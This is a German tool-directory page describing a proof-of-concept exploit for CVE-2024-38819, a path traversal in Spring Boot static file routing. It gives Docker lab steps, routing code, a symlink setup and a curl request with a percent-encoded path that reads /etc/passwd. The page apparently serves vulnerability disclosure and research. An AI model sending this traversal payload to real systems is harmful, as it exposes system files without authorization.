Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-38819-POC2 — Proof-of-Concept-Exploit für CVE-2024-38819, der Path Traversal über symbolische Links und Prozent-Encoding im statischen Datei-Routing von Spring Boot demonstriert. | Kitploit
Tools/GitHubGitHub/vishalnoza/cve-2024-38819-poc2
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubvishalnoza/cve-2024-38819-poc2

CVE-2024-38819-POC2

Proof-of-Concept-Exploit für CVE-2024-38819, der Path Traversal über symbolische Links und Prozent-Encoding im statischen Datei-Routing von Spring Boot demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
110vor 1 JahrNoch nicht geprüft

CVE-2024-38819: Proof of Concept (PoC)

Dies ist ein Proof of Concept für die von mir gemeldete Schwachstelle CVE-2024-38819, der einen Path-Traversal-Exploit demonstriert.

Ausführungsschritte

  1. Erstellen Sie das Docker-Image (Spring Boot 3.3.4, basierend auf Spring Framework 6.1.13)

    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. Starten Sie den Container und veröffentlichen Sie Port 8080 auf dem Host-Rechner

    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. Führen Sie den folgenden Befehl aus, um den PoC auszuführen und die Schwachstelle zu bestätigen

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Wenn der Angriff erfolgreich ist, wird der Inhalt der Datei /etc/passwd angezeigt.

Erklärung

  1. Erstellen Sie PathTraversalDemoApplication.java mit dem folgenden Code, um das Routing für statische Dateien mithilfe von RouterFunction und FileSystemResource einzurichten:

    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. Fügen Sie dem Dockerfile den folgenden Befehl hinzu, um einen symbolischen Link zu erstellen:

    RUN ln -s /static /app/static/link
    
  3. Erstellen Sie ein Payload, das Prozent-Encoding nutzt, um über den symbolischen Link Verzeichnisse zu traversieren.

    • Pfad: /static/link/%2e%2e/etc/passwd
  4. Verwenden Sie den folgenden curl-Befehl, um den PoC auszuführen und zu überprüfen, ob der Angriff erfolgreich ist:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Wenn der Angriff erfolgreich ist, wird der Inhalt der Datei /etc/passwd angezeigt.

Haftungsausschluss

Dieser PoC wird zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Vergewissern Sie sich vor der Verwendung in einem realen System, dass die Schwachstelle behoben wurde und Sie über die erforderliche Autorisierung verfügen. Der Autor übernimmt keinerlei Verantwortung für eine missbräuchliche Verwendung dieses Codes.

Tool herunterladen